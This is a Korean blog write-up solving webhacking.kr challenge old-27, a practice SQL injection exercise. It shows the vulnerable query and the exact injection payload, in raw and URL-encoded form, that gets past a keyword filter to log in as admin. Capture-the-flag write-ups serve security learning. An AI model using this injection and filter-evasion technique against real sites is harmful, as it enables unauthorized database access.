본문 바로가기
category/웹해킹(webhacking.kr)

웹해킹(webhacking.kr) - 27번

by 자운대고라니 2020. 11. 24.
반응형

안녕하세요??

자운대 고라니입니다.

오늘은 wargame.kr old-27번 문제를 풀어보겠습니다.


문제의 첫 화면은 그냥 SQL INJECIOTN을 해보라고 나와있다.

일단 vuew-source를 활용하여 코드를 확인하였다.

소스코드에서 중요한 부분을 캡처하였다.

간단한 INJECTION을 통해서 admin으로 로그인할 수 있을 거라 생각했다.

 


"select id from chall27 where id='guest' and no=({$_GET['no']})"

여기서 id='guest' and no=X 룰 FALSE로 만들고 ||, or을 사용하여서 뒤에 TRUE문을 만들어 주면 간단히 풀리는 문제이다.

나는 $_GET['no']"3)||no=2-- " 라는 값을 넣을 예정이다.

 

select id from chall27 where id='guest' and no=(3)||no=2-- )

-> select id from chall27 where no=2

 

여기서 preg_match가 걸려있으므로 이를 url을 통해서 필터링해준다.

"3)||no=2-- " -> "3)%7C%7Cno%0alike%0a2--%09"

이 값을 넣으면 문제가 풀린다.

처음 푸는 사람이라면 score가 올라갈 것이다.


솔직히 푸는데 오래 걸린 문제이다.

어려운 건 아닌데 나는 --%0a도 주석처리가 될 것이라고 생각하였으나, 알고 보니 안됐었다.

3)%7C%7Cno%0alike%0a2--%0a 를 계속 넣어서 삽질하였다. ㅠㅠ

 

반응형

'category > 웹해킹(webhacking.kr)' 카테고리의 다른 글

웹해킹(webhacking.kr) - 8번  (0) 2023.02.14
웹해킹(webhacking.kr) - 35번  (0) 2020.11.30
웹해킹(webhacking.kr) - 40번  (0) 2020.11.26
webhacking 기본  (0) 2020.11.24
웹해킹(webhacking.kr) - 24번  (0) 2020.11.21
웹해킹(webhacking.kr) - 16번  (0) 2020.11.21
웹해킹(webhacking.kr) - 50번  (0) 2020.11.21
웹해킹(webhacking.kr) - 45번  (0) 2020.11.20

댓글